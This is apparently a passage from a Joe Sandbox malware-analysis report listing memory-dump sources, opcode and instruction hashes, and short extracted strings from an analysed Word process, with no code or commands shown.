                                                                  • Instruction ID: 45722488ce7570f5fbc4f21ee40acb88759bd0d9434675b720ee2d3b75ddd011
                                                                  • Opcode Fuzzy Hash: 680280710537e820ce9bee63285d86646056c701e3462a20aee971620ecfac37
                                                                  • Instruction Fuzzy Hash: 4B41C371A19A1A8FEB44EBB8C859AED7BA1FF89301F544475D00AD3393DD38A8458790
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a568d8bbe09d6ab6660d481f4ffed25c54bbf7944b5f594f26a14f241e0c19ad
                                                                  • Instruction ID: 737ebc06797eb63c98d58994365e4c19267ab876d1e54a26e1774e78195af51c
                                                                  • Opcode Fuzzy Hash: a568d8bbe09d6ab6660d481f4ffed25c54bbf7944b5f594f26a14f241e0c19ad
                                                                  • Instruction Fuzzy Hash: 602106A068E6495FE341EB78C4A5DEE3FB1EF89241B9084A5D40BC33A7ED2869008781
                                                                  Memory Dump Source
                                                                  • Source File: 00000018.00000002.2080288252.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_24_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0951597459297e740e48e4e14c4da725aea831d9b49bab5e09b9da241db3c112
                                                                  • Instruction ID: 9904c383b91152d5fc96e45b268eeed9fc4aa1aaa7b135498d3d8235b3c9921b
                                                                  • Opcode Fuzzy Hash: 0951597459297e740e48e4e14c4da725aea831d9b49bab5e09b9da241db3c112
                                                                  • Instruction Fuzzy Hash: 4501996090DB918FF795A73858594713FE0CB92344B0804AAE88CC64D7EC08EA8883C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: 76601a2ef25899e93a8f271add9001992249d32aa997b0f49b916c48c1f49b1c
                                                                  • Instruction ID: b687f1f0a6926487f7227e477abcbfa95aaae9ebf978dd16d1413b5e90b8d943
                                                                  • Opcode Fuzzy Hash: 76601a2ef25899e93a8f271add9001992249d32aa997b0f49b916c48c1f49b1c
                                                                  • Instruction Fuzzy Hash: D7320560B29A558FF794EB3CC459A79B7D2FF99304F5085B9E00EC3296DE28EC418781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6$6$6$6$"r
                                                                  • API String ID: 0-3979851792
                                                                  • Opcode ID: ba20c6a6f12334d544095a447427200a5e349b2857556a4c0af7b13788713e4e
                                                                  • Instruction ID: 3217cb8ab53920d3e96423987260f6664f089d7cf7af2a66dfc68b5c4d04850c
                                                                  • Opcode Fuzzy Hash: ba20c6a6f12334d544095a447427200a5e349b2857556a4c0af7b13788713e4e
                                                                  • Instruction Fuzzy Hash: 4E22E461A29A598FF798E738C45DAB97BD2EF99304F4044B9E00EC32D6DD28EC458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 777b330c669fe68b683dedc64fc489a9676f27b901c59548e001b2fce876cae5
                                                                  • Instruction ID: 8e1e9082fff247472c58f62aeb50ddfde0b032ecca8ed5d2f80e7a6c9469b72b
                                                                  • Opcode Fuzzy Hash: 777b330c669fe68b683dedc64fc489a9676f27b901c59548e001b2fce876cae5
                                                                  • Instruction Fuzzy Hash: D951445161E6C58FE396A77898686757FE5EF87229B0804FBE0CDC71A3DD08480AC382
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 9N_^
                                                                  • API String ID: 0-1737749909
                                                                  • Opcode ID: 27bee95fb4b38e0f44446fef163c2f6299dde7155a178c845895757eb360a01e
                                                                  • Instruction ID: 603dd5e6a71dcfc5bb154574ed6588d4fa711b029091201b901e5982e6d08c70
                                                                  • Opcode Fuzzy Hash: 27bee95fb4b38e0f44446fef163c2f6299dde7155a178c845895757eb360a01e
                                                                  • Instruction Fuzzy Hash: C9616D65E8952A8BE741BBBCE4199FC7BE0EF85329B148176C00EC7397CD28B48587D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4N_^
                                                                  • API String ID: 0-2516135240
                                                                  • Opcode ID: 9d092b149a763e2a71645f8a9aff9ecd6a4032a7185f0af47b1a0dcb0e812a45
                                                                  • Instruction ID: b70401b7ec5f5f29c77fd346d8dbf3891bbc79c0b62fbd564cc3bd3575f42d3a
                                                                  • Opcode Fuzzy Hash: 9d092b149a763e2a71645f8a9aff9ecd6a4032a7185f0af47b1a0dcb0e812a45
                                                                  • Instruction Fuzzy Hash: 3C511961A0E6960FE396A73CD8696B57FD5DF87224B0940FBD08DC72A3DC1C9C468392
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: <N_^
                                                                  • API String ID: 0-1347224999
                                                                  • Opcode ID: f6f2bb7d624fc1346c6acbfdb32d0ec38e67425b913e9de5e9246ec39257f8a8
                                                                  • Instruction ID: 3db106f4a90122078942e0cc8e5cecb77c186753a599c58ee152f84be8d7a235
                                                                  • Opcode Fuzzy Hash: f6f2bb7d624fc1346c6acbfdb32d0ec38e67425b913e9de5e9246ec39257f8a8
                                                                  • Instruction Fuzzy Hash: 0E413725E8D6998FE342FB7CD8A59E93FE0EF85208744C0F6D44AC73A7DD28A4458781
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: r6
                                                                  • API String ID: 0-2984296541
                                                                  • Opcode ID: 12321e705831df9288f85e0c7e969ae87ee787d45e67dc42ac009a4d363fa534
                                                                  • Instruction ID: 1b1270c3ccfa72c46eda488783d5c04519f2c3cc5ee46c0483ffcf7ac00179e8
                                                                  • Opcode Fuzzy Hash: 12321e705831df9288f85e0c7e969ae87ee787d45e67dc42ac009a4d363fa534
                                                                  • Instruction Fuzzy Hash: 7F31F561B1C9584FE798E77CD85AB78B6C6EB99315F0405BEE04EC32A3DD249C418381
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6
                                                                  • API String ID: 0-1452363761
                                                                  • Opcode ID: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction ID: 84dc39e15fa4c5ceabd0d4c7761664e5b71e4d181e851cd8d9663ce5c3be1cb0
                                                                  • Opcode Fuzzy Hash: 8e736519cfe55247d85bb8911b358269cdc520920ffde39d3cf18a2e9ac1c5ac
                                                                  • Instruction Fuzzy Hash: F231F652B19A194FF784B7BC981EBBDBAD1EF99310F14417AE00DC3292DD289C418781
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction ID: 2fecf18e6b7eef6d6c583994f4b81d2a32ba8c64a8fa9fcb0cca17f9ba4abb60
                                                                  • Opcode Fuzzy Hash: cabc6bf1dc56fd86182925692bd80001804b1a6d3421a7618252e58c71c96352
                                                                  • Instruction Fuzzy Hash: 7B41F76798C6664BE241BBBCF4798FA7BD0DF412397088177D18DC96A3EC1474898BC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 315b72a6b1b79f36f0dde3f8571fa89cd5b674fa15afae368cbff5b2f9f39834
                                                                  • Instruction ID: 32bd054af8aa3619d124b61449c7d2073138dcca3fe1f584454585773b8ef617
                                                                  • Opcode Fuzzy Hash: 315b72a6b1b79f36f0dde3f8571fa89cd5b674fa15afae368cbff5b2f9f39834
                                                                  • Instruction Fuzzy Hash: 5721F66284E7954FE342A7B8D8798E97FB0AF42214B0881B7C08DCA1A3EC1864498795
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 69abf20bf585da4d567512df8572bd82451c7277e70146279c7e05404d177e83
                                                                  • Instruction ID: 1de00ae8cf58ee61e649d9256efe12a6748cec70335acd63c479f6a8b32471e0
                                                                  • Opcode Fuzzy Hash: 69abf20bf585da4d567512df8572bd82451c7277e70146279c7e05404d177e83
                                                                  • Instruction Fuzzy Hash: 9DA14B27B486668FD701BB7CE855AE97BE0EF85375B048177C14ACB293C9247486C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a6669132b3aeca83fb526c0c709e3958951da958ece32dc01e9000d49d9c633
                                                                  • Instruction ID: b603b2817c541d84b37bdd4c331fa8429f914af44e9f913449bfa3024ded1bf6
                                                                  • Opcode Fuzzy Hash: 0a6669132b3aeca83fb526c0c709e3958951da958ece32dc01e9000d49d9c633
                                                                  • Instruction Fuzzy Hash: 14914A26B889268BD740BB7CF819AE97BD0EF85375B048577C24ECB293C924648687D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d490106021536439218aecd9fb8edaf9c8a0d025db1c7643cde543d1b307144a
                                                                  • Instruction ID: 1151a3e4f1b35819f42b4a69c3577608466bfe559e6fac25311d1e83d4974a69
                                                                  • Opcode Fuzzy Hash: d490106021536439218aecd9fb8edaf9c8a0d025db1c7643cde543d1b307144a
                                                                  • Instruction Fuzzy Hash: 91816B26B889268BE741BB7CF819AE97BE0EF85375B148577C14EC7293C9247486C7C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5176a934b228763abaf32df3b8bfb67446b9525c91aa226f7d10e35e0d7ccbb
                                                                  • Instruction ID: 83d5616af7d86e243bcfdd215a25e39ae3256e62a41ed8c5fcb14d16244c8a28
                                                                  • Opcode Fuzzy Hash: e5176a934b228763abaf32df3b8bfb67446b9525c91aa226f7d10e35e0d7ccbb
                                                                  • Instruction Fuzzy Hash: 3A816A26B889268BE740BB7CF819AE97BE0EF85375B048177C14EC7293C9247486C7C0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 475fc107df324f001e86c19cd29cf063de18b3f3906576776284fdcd377c9f18
                                                                  • Instruction ID: e0ec925d0142822cb1aa75685ce1e90be696d218437a14904c0d20de4a47d5de
                                                                  • Opcode Fuzzy Hash: 475fc107df324f001e86c19cd29cf063de18b3f3906576776284fdcd377c9f18
                                                                  • Instruction Fuzzy Hash: 1E715926B889268BE740BB7CE819AE97BE0EF85365B148177C14EC7293C9247486C7D0
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 890c6af1db8ee8f1c70c7c37c3e2b46c96d6e9b129551778fc189beefac7eb09
                                                                  • Instruction ID: 187f0985d31ee0b16a28cc0b3d97b7a3a59364d40a3f3565e278b2523f77b252
                                                                  • Opcode Fuzzy Hash: 890c6af1db8ee8f1c70c7c37c3e2b46c96d6e9b129551778fc189beefac7eb09
                                                                  • Instruction Fuzzy Hash: A1515C61E8E6898FE341EB7CD8A59E57FE0EF81208754C0F6D08AC73A7DC2894498785
                                                                  Memory Dump Source
                                                                  • Source File: 00000019.00000002.2177528031.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_25_2_7ffaac470000_Word.jbxd